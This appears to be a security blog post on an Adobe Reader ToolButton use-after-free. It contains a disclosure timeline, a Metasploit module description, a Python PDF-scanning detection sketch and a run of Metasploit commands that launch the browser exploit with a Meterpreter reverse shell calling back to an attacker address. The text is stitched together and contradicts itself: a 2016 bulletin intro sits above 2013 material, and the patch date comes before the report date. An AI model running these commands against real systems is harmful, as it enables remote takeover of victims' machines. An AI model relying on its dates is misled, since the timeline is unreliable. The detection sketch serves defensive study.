On January 12th 2016, during its January Patch Tuesday, Adobe released one Adobe Acrobat and Reader security bulletin dealing with 17 vulnerabilities. This security bulletin has a Critical severity rating.
Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI on 2013-09-11
Patched by the vendor via APSB13-15 on 2013-08-03
Coordinated public release of advisory by ZDI on 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability on 2013-11-27
Metasploit PoC provided on 2013-12-16
Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.
Tested on :
with Adobe Reader 11.0.2 on Windows XP SP3
Description :
This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exists as a file format module: exploit/windows/fileformat/adobe_toolbutton
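A defensive triage sketch for the ToolButton/cEnable condition described above, added here as an example (it is not part of the Metasploit module or of the original post): it inflates Flate-compressed PDF streams and flags documents whose JavaScript calls addToolButton together with a cEnable callback. The function names and the sample document are constructed for illustration, and a match is a heuristic signal only.

```python
import re
import zlib

# Indicators come from the description above: the ToolButton object and its
# cEnable callback. Seeing both is a triage signal, not proof of exploitation.
INDICATORS = {
    "addToolButton": re.compile(rb"addToolButton\s*\("),
    "cEnable": re.compile(rb"\bcEnable\b"),
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\n?endstream", re.DOTALL)


def decoded_views(pdf_bytes):
    """Yield the raw file, then every stream body that inflates with zlib."""
    yield pdf_bytes
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            # decompressobj tolerates trailing or slightly truncated data
            yield zlib.decompressobj().decompress(match.group(1))
        except zlib.error:
            continue  # not Flate-compressed; the raw view already covers it


def scan_pdf(pdf_bytes):
    """Return the sorted names of the indicators found in any view."""
    found = set()
    for view in decoded_views(pdf_bytes):
        found.update(n for n, rx in INDICATORS.items() if rx.search(view))
    return sorted(found)


def is_suspicious(pdf_bytes):
    """True when a toolbar button is registered together with cEnable."""
    return scan_pdf(pdf_bytes) == ["addToolButton", "cEnable"]


def build_sample(js, compress):
    """Constructed test input: a minimal PDF-like file with one stream."""
    body = zlib.compress(js) if compress else js
    head = b"%%PDF-1.4\n1 0 obj\n<< /Length %d >>\nstream\n" % len(body)
    return head + body + b"\nendstream\nendobj\n%%EOF\n"


# Constructed, benign JavaScript that only registers a button (no exploit logic).
BENIGN_BUTTON_JS = b'app.addToolButton({cName: "demo", cExec: "1", cEnable: "true"});'

if __name__ == "__main__":
    for compressed in (False, True):
        sample = build_sample(BENIGN_BUTTON_JS, compressed)
        print(compressed, scan_pdf(sample), is_suspicious(sample))
```

Legitimate documents can also register toolbar buttons, so a hit should route the file to sandboxed analysis or manual review rather than being treated as a verdict.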
Commands :
use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit
getuid
sysinfo